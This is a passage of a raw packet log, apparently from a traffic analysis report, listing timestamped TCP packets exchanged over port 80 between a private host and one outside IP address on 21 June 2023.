                                                                                                  Jun 21, 2023 20:23:40.330395937 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330421925 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330468893 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330495119 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330516100 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330560923 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330579042 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330605984 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330660105 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330667973 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330724001 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330770969 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330789089 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330816031 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330862045 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330876112 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.330925941 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330974102 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.330990076 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331020117 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331064939 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331090927 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331109047 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331156015 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331168890 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331201077 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331247091 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331259966 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331293106 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331337929 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331348896 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331383944 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331429958 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331446886 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331475973 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331521988 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331538916 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331567049 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331613064 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331620932 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331660986 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331706047 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331720114 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331764936 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331824064 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331828117 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.331876993 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331943035 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.331944942 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.332003117 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.332062006 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.332070112 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.332108974 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.332154036 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.332169056 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.332200050 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.332238913 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.332261086 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.332329988 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.332382917 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.332401037 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.374587059 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.380414963 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.421483994 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.585968971 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586035013 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586081982 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586118937 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.586131096 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586175919 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586219072 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.586222887 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586292028 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586296082 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.586340904 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586389065 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586414099 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.586436987 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586483002 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586503029 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.586530924 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586576939 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586589098 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.586623907 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586673021 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586690903 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.586719990 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586767912 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586786032 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.586813927 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586860895 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586886883 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.586925983 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586971998 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.586986065 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587024927 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587071896 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587090969 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587117910 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587162971 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587179899 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587208986 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587254047 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587264061 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587301970 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587347031 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587367058 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587393045 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587439060 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587460041 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587486029 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587532997 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587553024 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587579966 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587625980 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587637901 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587671995 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587717056 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587728977 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587763071 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587814093 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587829113 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587862968 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587908030 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587924004 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.587953091 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.587999105 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.588011980 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.588046074 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.588104963 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.588112116 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.588159084 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.588203907 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.588217974 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.588249922 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.588326931 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.628072977 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.671500921 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.674978971 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.718564987 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.841679096 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.841778994 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.841859102 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.841867924 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.842139006 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842221975 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842279911 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842302084 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.842329979 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842364073 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.842377901 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842427015 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842442036 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.842494011 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842544079 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842582941 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.842590094 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842636108 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842649937 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.842683077 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842727900 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842756987 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.842775106 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842823029 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842842102 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.842869043 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842917919 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.842959881 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.842967033 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843014002 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843055964 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843061924 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843130112 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843138933 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843205929 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843252897 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843272924 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843314886 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843381882 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843385935 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843432903 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843477964 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843523026 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843528986 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843570948 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843578100 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843617916 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843664885 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843683958 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843710899 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843759060 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843770027 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843806028 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843851089 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843872070 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843898058 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843945026 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.843959093 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.843991041 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.844038010 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.844048977 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.844084024 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.844130039 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.844144106 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.844178915 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.844244957 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.844247103 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.844352007 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.844413042 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.844419003 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.844482899 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.844549894 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.925045013 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:40.968427896 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:40.972026110 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.015304089 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.097970009 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098037004 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098086119 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098133087 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098187923 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098236084 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098289967 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.098300934 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098350048 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098380089 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.098397017 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098443031 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098488092 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.098493099 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098556042 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.098556995 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098606110 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098638058 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.098656893 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098702908 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098748922 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098773003 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.098793983 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098830938 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.098840952 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098886967 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098933935 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.098936081 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.098985910 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099004984 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.099055052 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099107981 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099145889 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.099152088 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099196911 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099241018 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099282026 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099324942 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099332094 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.099410057 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099452972 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099495888 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099514008 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.099539995 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099585056 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099627972 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099634886 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.099672079 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099689960 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.099716902 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099760056 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099802971 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099821091 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.099845886 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099864960 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.099890947 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099937916 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.099982023 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.100024939 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.100045919 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.100070953 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.100136995 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.100189924 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.100234985 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.100295067 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.100334883 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.103549004 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.222035885 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.222115040 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.222903967 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.268867016 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.268929005 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.269020081 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.353826046 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.353885889 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.353936911 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.353985071 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354032993 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354065895 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.354079008 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354123116 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354150057 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.354171991 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354217052 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354254007 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.354260921 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354309082 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354352951 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354399920 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354424000 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.354445934 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354490995 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354536057 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354566097 CEST4969580192.168.2.4211.168.53.110
                                                                                                  Jun 21, 2023 20:23:41.354583025 CEST8049695211.168.53.110192.168.2.4
                                                                                                  Jun 21, 2023 20:23:41.354648113 CEST4969580192.168.2.4211.168.53.110
